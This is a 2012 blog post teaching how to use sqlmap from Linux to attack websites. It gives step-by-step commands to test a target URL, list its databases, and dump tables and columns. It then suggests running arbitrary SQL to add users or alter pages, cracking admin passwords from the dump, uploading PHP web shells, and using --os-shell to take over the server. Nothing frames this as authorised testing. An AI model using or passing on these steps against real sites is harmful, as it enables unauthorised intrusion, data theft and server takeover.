All great things are simple, and many can be expressed in single words: freedom, justice, honor, duty, mercy, hope

Saturday, November 10, 2012

HOW TO DO SQL INJECTION FROM LINUX?

Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it also works in windows.SQLMAP is far more advanced than HAVIJ.

How To Use SqlMap?


(1)Download SQLMAP here.

(2)Now extract it wherever you want.

(3)Change directory & I mean if you extract to download then, open terminal & type following code

cd Downloads

cd sqlmapproject-sqlmap-f305dde

(4)Now if you want to find url is vulnerable to sql injection or not. Type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”

sql-injection-test

(5)To get database of website. Type following command in terminal

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dbs

sqlmap-dbs

(6)To get tables & columns of database , type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”--tables --columns

sqlmap-tables-column


sqlmap-tables-column

(7)To Get data of particular database & Table , type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dump -D “database_name” -T “table _name”

sqlmap-dump

sqlmap-dump-data


Now , you can view all database from following directory.

/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output

What`s next you can do?


1-Execute arbitrary Sql command on the server

This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.

Another parameter --sql-shell would give an sql shell like interface to run queries interactively.

2-Get inside the admin panel and play

If the website is running some kind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by brute forcing, however long length complex passwords may not be breakable.

Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitrary system commands. Php web shell scripts can be uploaded to do the same thing.

3-Shell on remote OS

This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.

No comments:

Post a Comment

UA-35960349-1